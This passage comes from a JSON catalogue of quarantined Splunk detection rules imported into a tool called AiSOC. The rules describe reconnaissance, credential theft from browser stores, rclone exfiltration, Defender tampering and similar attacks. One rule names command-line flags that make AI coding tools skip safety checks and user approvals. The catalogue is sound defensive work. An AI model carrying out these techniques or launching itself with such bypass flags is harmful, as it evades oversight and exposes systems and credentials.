If confirmed malicious, this could allow attackers to gather network information, aiding in further attacks or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1590.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-gather-victim-network-info-through-ip-check-web-services.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "70f7c952-0758-46d6-9148-d8969c4481d1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/windows_gather_victim_network_info_through_ip_check_web_services.yml" } }, { "id": "splunk-security-content-70fac80e-0bf1-11ec-9ba0-acde48001122", "type": "detection", "name": "Get-ForestTrust with PowerShell Script Block", "description": "The following analytic detects the execution of the Get-ForestTrust command from PowerSploit using PowerShell Script Block Logging (EventCode=4104). This method captures the full command sent to PowerShell, providing detailed visibility into potentially suspicious activities. Monitoring this behavior is crucial as it can indicate an attempt to gather domain trust information, which is often a precursor to lateral movement or privilege escalation. 
If confirmed malicious, this activity could allow an attacker to map trust relationships within the domain, facilitating further exploitation and access to sensitive resources.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1482", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/get-foresttrust-with-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "70fac80e-0bf1-11ec-9ba0-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/get_foresttrust_with_powershell_script_block.yml" } }, { "id": "splunk-security-content-711d9e8c-2cb0-45cf-8813-5f191ecb9b26", "type": "detection", "name": "O365 Safe Links Detection", "description": "The following analytic detects when any Microsoft Safe Links alerting is triggered. 
This behavior may indicate that a user has interacted with a phishing or otherwise malicious link within the Microsoft Office ecosystem.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-safe-links-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "711d9e8c-2cb0-45cf-8813-5f191ecb9b26", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_safe_links_detection.yml" } }, { "id": "splunk-security-content-7141122c-3bc2-4aaa-ab3b-7a85a0bbefc3", "type": "detection", "name": "GetWmiObject Ds Computer with PowerShell", "description": "The following analytic detects the execution of `powershell.exe` with command-line arguments that utilize the `Get-WmiObject` cmdlet to discover remote systems, specifically targeting the `DS_Computer` parameter.\nThis detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions.\nThis activity is significant as it indicates potential reconnaissance efforts by adversaries to enumerate domain computers and gather situational awareness within Active Directory.\nIf confirmed malicious, this behavior could allow attackers to map the network, identify critical systems, and plan further attacks, potentially leading to unauthorized access and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ 
"T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getwmiobject-ds-computer-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7141122c-3bc2-4aaa-ab3b-7a85a0bbefc3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getwmiobject_ds_computer_with_powershell.yml" } }, { "id": "splunk-security-content-7173b2ad-6146-418f-85ae-c3479e4515fc", "type": "detection", "name": "Linux Clipboard Data Copy", "description": "The following analytic detects the use of the Linux 'xclip' command to copy data from the clipboard. It leverages Endpoint Detection and Response (EDR) telemetry, focusing on process names and command-line arguments related to clipboard operations. This activity is significant because adversaries can exploit clipboard data to capture sensitive information such as passwords or IP addresses. 
If confirmed malicious, this technique could lead to unauthorized data exfiltration, compromising sensitive information and potentially aiding further attacks within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1115" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-clipboard-data-copy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7173b2ad-6146-418f-85ae-c3479e4515fc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_clipboard_data_copy.yml" } }, { "id": "splunk-security-content-719f8c78-b20d-4bb9-8c33-6d1a762e7a9a", "type": "detection", "name": "Cisco NVM - Rclone Execution With Network Activity", "description": "This detection identifies execution of the file synchronization utility \"rclone\".\nIt leverages Cisco Network Visibility Module logs, specifically flow data in order to capture process executions\ninitiating network connections.\nWhile rclone is a legitimate command-line tool for syncing data to cloud storage providers, it has been widely abused by threat actors for data exfiltration.\nThis analytic inspects process name and arguments for rclone and flags usage of suspicious flags.\nIf matched, this could indicate malicious usage for stealthy data exfiltration or cloud abuse.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1567.002" ], "log_source": null, "playbook": null, "verified": false, "source": 
"splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-nvm-rclone-execution-with-network-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "719f8c78-b20d-4bb9-8c33-6d1a762e7a9a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_nvm___rclone_execution_with_network_activity.yml" } }, { "id": "splunk-security-content-71ad47d1-d6bd-4e0a-b35c-020ad9a6959e", "type": "detection", "name": "Okta Suspicious Use of a Session Cookie", "description": "The following analytic identifies suspicious use of a session cookie by detecting multiple client values (IP, User Agent, etc.) changing for the same Device Token associated with a specific user. It leverages policy evaluation events from successful authentication logs in Okta. This activity is significant as it may indicate an adversary attempting to reuse a stolen web session cookie, potentially bypassing authentication mechanisms. 
If confirmed malicious, this could allow unauthorized access to user accounts, leading to data breaches or further exploitation within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1539" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/okta-suspicious-use-of-a-session-cookie.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "71ad47d1-d6bd-4e0a-b35c-020ad9a6959e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/okta_suspicious_use_of_a_session_cookie.yml" } }, { "id": "splunk-security-content-71b289db-5f2c-4c43-8256-8bf26ae7324a", "type": "detection", "name": "Windows AD Abnormal Object Access Activity", "description": "The following analytic identifies a statistically significant increase in access to Active Directory objects, which may indicate attacker enumeration. It leverages Windows Security Event Code 4662 to monitor and analyze access patterns, comparing them against historical averages to detect anomalies. This activity is significant for a SOC because abnormal access to AD objects can be an early indicator of reconnaissance efforts by an attacker. 
If confirmed malicious, this behavior could lead to unauthorized access, privilege escalation, or further compromise of the Active Directory environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-abnormal-object-access-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "71b289db-5f2c-4c43-8256-8bf26ae7324a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_abnormal_object_access_activity.yml" } }, { "id": "splunk-security-content-71bfdb13-f200-4c6c-b2c9-a2e07adf437d", "type": "detection", "name": "WMI Permanent Event Subscription", "description": "The following analytic detects the creation of permanent event subscriptions using Windows Management Instrumentation (WMI). It leverages Sysmon EventID 5 data to identify instances where the event consumers are not the expected \"NTEventLogEventConsumer.\" (Review note: Sysmon Event ID 5 is process termination; WMI filter/consumer/binding creation is normally surfaced by Sysmon Event IDs 19-21 or Microsoft-Windows-WMI-Activity/Operational Event ID 5861. Confirm the actual log source against the upstream search before enabling this rule, and consider mapping it to T1546.003, the persistence technique this description refers to, in addition to T1047.) This activity is significant because it suggests an attacker is attempting to achieve persistence by running malicious scripts or binaries in response to specific system events. If confirmed malicious, this could lead to severe impacts such as data theft, ransomware deployment, or other damaging outcomes. 
Investigate the associated scripts or binaries to identify the source of the attack.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/wmi-permanent-event-subscription.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "71bfdb13-f200-4c6c-b2c9-a2e07adf437d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/wmi_permanent_event_subscription.yml" } }, { "id": "splunk-security-content-71e1fb89-dd5f-4691-8523-575420de4630", "type": "detection", "name": "AWS Multiple Users Failing To Authenticate From Ip", "description": "The following analytic identifies a single source IP failing to authenticate into the AWS Console with 30 unique valid users within 10 minutes. It leverages CloudTrail logs to detect multiple failed login attempts from the same IP address. This behavior is significant as it may indicate a Password Spraying attack, where an adversary attempts to gain unauthorized access or elevate privileges by trying common passwords across many accounts. 
If confirmed malicious, this activity could lead to unauthorized access, data breaches, or further exploitation within the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003", "T1110.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-multiple-users-failing-to-authenticate-from-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "71e1fb89-dd5f-4691-8523-575420de4630", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_multiple_users_failing_to_authenticate_from_ip.yml" } }, { "id": "splunk-security-content-72013a8e-5cea-408a-9d51-5585386b4d69", "type": "detection", "name": "Windows Credential Access From Browser Password Store", "description": "The following analytic identifies an uncommon process accessing a browser's user data profile. This tactic/technique has been observed in various Trojan Stealers, such as SnakeKeylogger, which attempt to gather sensitive browser information and credentials as part of their exfiltration strategy. Detecting this anomaly can serve as a valuable pivot for identifying processes that access lists of browser user data profiles unexpectedly. 
This detection uses a lookup file `browser_app_list` that maintains a list of well known browser applications and the browser paths that are allowed to access the browser user data profiles.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-credential-access-from-browser-password-store.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "72013a8e-5cea-408a-9d51-5585386b4d69", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_credential_access_from_browser_password_store.yml" } }, { "id": "splunk-security-content-7215831c-8252-4ae3-8d43-db588e82f952", "type": "detection", "name": "Windows Impair Defense Define Win Defender Threat Action", "description": "The following analytic detects modifications to the Windows Defender ThreatSeverityDefaultAction registry setting. It leverages data from the Endpoint.Registry datamodel to identify changes in registry values that define how Windows Defender responds to threats. This activity is significant because altering these settings can impair the system's defense mechanisms, potentially allowing threats to go unaddressed. 
If confirmed malicious, this could enable attackers to bypass antivirus protections, leading to persistent threats and increased risk of data compromise or further system exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-define-win-defender-threat-action.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7215831c-8252-4ae3-8d43-db588e82f952", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_define_win_defender_threat_action.yml" } }, { "id": "splunk-security-content-72170ec5-f7d2-42f5-aefb-2b8be6aad15f", "type": "detection", "name": "Detect Regasm Spawning a Process", "description": "The following analytic detects regasm.exe spawning a child process. This behavior is identified using data from Endpoint Detection and Response (EDR) agents, focusing on process creation events where regasm.exe is the parent process. This activity is significant because regasm.exe spawning a process is rare and can indicate an attempt to bypass application control mechanisms. If confirmed malicious, this could allow an attacker to execute arbitrary code, potentially leading to privilege escalation or persistent access within the environment. 
Immediate investigation is recommended to determine the legitimacy of the spawned process and any associated activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.009" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-regasm-spawning-a-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "72170ec5-f7d2-42f5-aefb-2b8be6aad15f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_regasm_spawning_a_process.yml" } }, { "id": "splunk-security-content-723716de-ee55-4cd4-9759-c44e7e55ba4b", "type": "detection", "name": "Detect HTML Help Spawn Child Process", "description": "The following analytic detects the execution of hh.exe (HTML Help) spawning a child process, indicating the use of a Compiled HTML Help (CHM) file to execute Windows script code. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events where hh.exe is the parent process. This activity is significant as it may indicate an attempt to execute malicious scripts via CHM files, a known technique for bypassing security controls. 
If confirmed malicious, this could lead to unauthorized code execution, potentially compromising the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-html-help-spawn-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "723716de-ee55-4cd4-9759-c44e7e55ba4b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/detect_html_help_spawn_child_process.yml" } }, { "id": "splunk-security-content-723b861a-92eb-11eb-93b8-acde48001122", "type": "detection", "name": "AWS IAM Failure Group Deletion", "description": "The following analytic identifies failed attempts to delete AWS IAM groups. It leverages AWS CloudTrail logs to detect events where the DeleteGroup action fails due to errors like NoSuchEntityException, DeleteConflictException, or AccessDenied. This activity is significant as it may indicate unauthorized attempts to modify IAM group configurations, which could be a precursor to privilege escalation or other malicious actions. 
If confirmed malicious, this could allow an attacker to disrupt IAM policies, potentially leading to unauthorized access or denial of service within the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-iam-failure-group-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "723b861a-92eb-11eb-93b8-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_iam_failure_group_deletion.yml" } }, { "id": "splunk-security-content-726959fe-316d-445c-a584-fa187d64e295", "type": "detection", "name": "ASL AWS IAM Assume Role Policy Brute Force", "description": "The following analytic detects multiple failed attempts to assume an AWS IAM role, indicating a potential brute force attack. It leverages AWS CloudTrail logs to identify `MalformedPolicyDocumentException` errors with a status of `failure` and filters out legitimate AWS services. This activity is significant as repeated failures to assume roles can indicate an adversary attempting to guess role names, which is a precursor to unauthorized access. 
If confirmed malicious, this could lead to unauthorized access to AWS resources, potentially compromising sensitive data and services.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1580", "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-iam-assume-role-policy-brute-force.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "726959fe-316d-445c-a584-fa187d64e295", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_iam_assume_role_policy_brute_force.yml" } }, { "id": "splunk-security-content-72793bc0-c0cd-400e-9e60-fdf36f278917", "type": "detection", "name": "Windows AD GPO Disabled", "description": "This detection identifies when an Active Directory Group Policy is disabled using the Group Policy Management Console.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001", "T1484.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-gpo-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "72793bc0-c0cd-400e-9e60-fdf36f278917", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", 
"imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_gpo_disabled.yml" } }, { "id": "splunk-security-content-729aab57-d26f-4156-b97f-ab8dda8f44b1", "type": "detection", "name": "Linux Deletion Of Init Daemon Script", "description": "The following analytic detects the deletion of init daemon scripts on a Linux machine. It leverages filesystem event logs to identify when files within the /etc/init.d/ directory are deleted. This activity is significant because init daemon scripts control the start and stop of critical services, and their deletion can indicate an attempt to impair security features or evade defenses. If confirmed malicious, this behavior could allow an attacker to disrupt essential services, execute destructive payloads, or persist undetected in the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004", "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-deletion-of-init-daemon-script.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "729aab57-d26f-4156-b97f-ab8dda8f44b1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_deletion_of_init_daemon_script.yml" } }, { "id": "splunk-security-content-72cb9de9-e98b-4ac9-80b2-5331bba6ea97", "type": "detection", "name": "Circle CI Disable Security Step", "description": "The following analytic detects the disablement of security steps in a CircleCI pipeline. 
It leverages CircleCI logs, using field renaming, joining, and statistical analysis to identify instances where mandatory security steps are not executed. This activity is significant because disabling security steps can introduce vulnerabilities, unauthorized changes, or malicious code into the pipeline. If confirmed malicious, this could lead to potential attacks, data breaches, or compromised infrastructure. Investigate by reviewing job names, commit details, and user information associated with the disablement, and examine any relevant artifacts and concurrent processes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1554" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/circle-ci-disable-security-step.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "72cb9de9-e98b-4ac9-80b2-5331bba6ea97", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/circle_ci_disable_security_step.yml" } }, { "id": "splunk-security-content-7349a9e9-3cf6-4171-bb0c-75607a8dcd1a", "type": "detection", "name": "Windows Regsvr32 Renamed Binary", "description": "The following analytic identifies instances where the regsvr32.exe binary has been renamed and executed. This detection leverages Endpoint Detection and Response (EDR) data, specifically focusing on the original filename metadata. Renaming regsvr32.exe is significant as it can be an evasion technique used by attackers to bypass security controls. 
If confirmed malicious, this activity could allow an attacker to execute arbitrary DLLs, potentially leading to code execution, privilege escalation, or persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.010" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-regsvr32-renamed-binary.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7349a9e9-3cf6-4171-bb0c-75607a8dcd1a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_regsvr32_renamed_binary.yml" } }, { "id": "splunk-security-content-737e1eb0-065a-11ec-921a-acde48001122", "type": "detection", "name": "Get ADUserResultantPasswordPolicy with Powershell Script Block", "description": "The following analytic detects the execution of the `Get-ADUserResultantPasswordPolicy` PowerShell cmdlet, which is used to obtain the password policy in a Windows domain. It leverages PowerShell Script Block Logging (EventCode=4104) to identify this activity. Monitoring this behavior is significant as it may indicate an attempt to enumerate domain policies, a common tactic used by adversaries for situational awareness and Active Directory discovery. 
If confirmed malicious, this activity could allow attackers to understand password policies, aiding in further attacks such as password guessing or policy exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1201" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/get-aduserresultantpasswordpolicy-with-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "737e1eb0-065a-11ec-921a-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/get_aduserresultantpasswordpolicy_with_powershell_script_block.yml" } }, { "id": "splunk-security-content-737e8baa-d44e-4fa9-8281-24056ed424c0", "type": "detection", "name": "Linux Auditd AI CLI Permission Override Activated", "description": "This detection identifies when an AI command-line tool is launched in an unsafe mode that bypasses normal safety checks and user approvals.\nFor instance, running claude --dangerously-skip-permissions skips all safety restrictions, allowing the tool to operate freely, while gemini --yolo automatically approves all actions without prompting the user.\nThese modes, often called permission overrides or YOLO mode, let the AI execute commands, modify files, or perform tasks without confirmation.\nDetecting their use is important to prevent unintended or potentially harmful operations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1480" ], "log_source": 
null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-ai-cli-permission-override-activated.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "737e8baa-d44e-4fa9-8281-24056ed424c0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_ai_cli_permission_override_activated.yml" } }, { "id": "splunk-security-content-73922ff8-3022-11ec-bf5e-acde48001122", "type": "detection", "name": "Disable Defender Submit Samples Consent Feature", "description": "The following analytic detects the modification of the Windows registry to disable the Windows Defender Submit Samples Consent feature. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the registry path associated with Windows Defender SpyNet and the SubmitSamplesConsent value set to 0x00000000. This activity is significant as it indicates an attempt to bypass or evade detection by preventing Windows Defender from submitting samples for further analysis. 
If confirmed malicious, this could allow an attacker to execute malicious code without being detected by Windows Defender, leading to potential system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disable-defender-submit-samples-consent-feature.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "73922ff8-3022-11ec-bf5e-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disable_defender_submit_samples_consent_feature.yml" } }, { "id": "splunk-security-content-739ed682-27e9-4ba0-80e5-a91b97698213", "type": "detection", "name": "ASL AWS ECR Container Upload Outside Business Hours", "description": "The following analytic detects the upload of new container images to AWS Elastic Container Registry (ECR) outside of standard business hours through AWS CloudTrail events. It identifies this behavior by monitoring for `PutImage` events occurring before 8 AM or after 8 PM, as well as any uploads on weekends. This activity is significant for a SOC to investigate as it may indicate unauthorized access or malicious deployments, potentially leading to compromised services or data breaches. 
Identifying and addressing such uploads promptly can mitigate the risk of security incidents and their associated impacts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-ecr-container-upload-outside-business-hours.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "739ed682-27e9-4ba0-80e5-a91b97698213", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_ecr_container_upload_outside_business_hours.yml" } }, { "id": "splunk-security-content-73a56508-1cf5-4df7-b8d9-5737fbdc27d2", "type": "detection", "name": "Linux Account Manipulation Of SSH Config and Keys", "description": "The following analytic detects the deletion of SSH keys on a Linux machine. It leverages filesystem event logs to identify when files within \"/etc/ssh/*\" or \"~/.ssh/*\" are deleted. This activity is significant because attackers may delete or modify SSH keys to evade security measures or as part of a destructive payload, similar to the AcidRain malware. 
